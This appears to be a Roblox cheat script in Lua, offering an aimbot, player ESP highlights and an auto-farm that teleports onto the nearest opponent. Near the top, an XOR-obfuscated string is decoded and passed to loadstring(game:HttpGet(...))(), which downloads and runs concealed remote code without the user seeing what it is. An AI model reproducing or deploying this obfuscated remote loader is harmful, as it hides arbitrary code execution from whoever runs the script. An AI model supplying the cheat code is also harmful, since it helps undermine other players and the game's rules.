--[[
┌────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│                                                                                                                                    │
│    ───┐  │      ____    ____   __  __ __   __   __  __    ____        _      _     __        __  _____   ____       ───┐   │       │
│       │  │     |  _ \  |  _ \  \ \/ / \ \ / /   \ \/ /   |  _ \      | |    / \    \ \      / / | ____| |  _ \         │   │       │
│    ┌──┼──┘     | |_) | | |_) |  \  /   \ V /     \  /    | | | |  _  | |   / _ \    \ \ /\ / /  |  _|   | | | |     ┌──┼───┘       │
│    │  │        |  __/  |  _ <   /  \    | |      /  \    | |_| | | |_| |  / ___ \    \ V  V /   | |___  | |_| |     │  │           │
│    │  │        |_|     |_| \_\ /_/\_\   |_|     /_/\_\   |____/   \___/  /_/   \_\    \_/\_/    |_____| |____/      │  │           │
│    │  └───                                                                                                          │  └────       │
│                                                                                                                                    │
└────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘
]]--

-- Simplified script with key functionalities

local function xorStr(str, key)
    local result = {}
    for i = 1, #str do
        result[i] = string.char(bit32.bxor(string.byte(str, i), string.byte(key, (i - 1) % #key + 1)))
    end
    return table.concat(result)
end

local encodedScript = "\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\200\45\234\190\223\9\208\209\222\106\201\169\206\17\223\140\214\36\239\181\136\13\222\214\201\38\227"
local key = "\126\177\163\187\69\134\219\167"
local decodedScript = xorStr(encodedScript, key)

loadstring(game:HttpGet(decodedScript))()

-- Toggles and configurations
local aimbotEnabled = false
local espEnabled = false
local autoFarmEnabled = false
local smoothness = 0.6

local players = game:GetService("Players")
local localPlayer = players.LocalPlayer
local mouse = localPlayer:GetMouse()
local runService = game:GetService("RunService")
local camera = workspace.CurrentCamera

-- ESP Function
local function createESP(player)
    if player.Character and not player.Character:FindFirstChild("Totally_NOT_Esp") then
        local espBox = Instance.new("Highlight")
        espBox.Name = "Totally_NOT_Esp"
        espBox.Adornee = player.Character
        espBox.FillColor = Color3.new(1, 0, 0)
        espBox.FillTransparency = 0.5
        espBox.OutlineColor = Color3.new(1, 1, 1)
        espBox.OutlineTransparency = 0
        espBox.Parent = player.Character
    end
end

local function updateESP()
    for _, player in pairs(players:GetPlayers()) do
        if player ~= localPlayer then
            createESP(player)
        end
    end
end

-- Auto Farm Function
local function getClosestTarget()
    local closestPlayer = nil
    local shortestDistance = math.huge

    for _, player in pairs(players:GetPlayers()) do
        if player ~= localPlayer and player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
            local distance = (localPlayer.Character.HumanoidRootPart.Position - player.Character.HumanoidRootPart.Position).Magnitude
            if distance < shortestDistance then
                shortestDistance = distance
                closestPlayer = player
            end
        end
    end

    return closestPlayer
end

local autoFarmConnection = nil
local function startAutoFarm()
    autoFarmConnection = runService.RenderStepped:Connect(function()
        if autoFarmEnabled then
            local target = getClosestTarget()
            if target and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
                local targetPos = target.Character.HumanoidRootPart.Position + Vector3.new(0, 5, 0)
                localPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(targetPos)
            end
        end
    end)
end

-- Aimbot Function
local function aimAtTarget()
    if aimbotEnabled then
        local target = getClosestTarget()
        if target and target.Character and target.Character:FindFirstChild("Head") then
            local targetPos = target.Character.Head.Position
            camera.CFrame = camera.CFrame:Lerp(CFrame.new(camera.CFrame.Position, targetPos), smoothness)
        end
    end
end

-- Bindings
mouse.Button1Down:Connect(function()
    aimbotEnabled = not aimbotEnabled
    while aimbotEnabled do
        aimAtTarget()
        runService.RenderStepped:Wait()
    end
end)

runService.RenderStepped:Connect(function()
    if espEnabled then
        updateESP()
    end
end)

players.PlayerAdded:Connect(function(player)
    player.CharacterAdded:Connect(function()
        if espEnabled then
            createESP(player)
        end
    end)
end)

startAutoFarm()
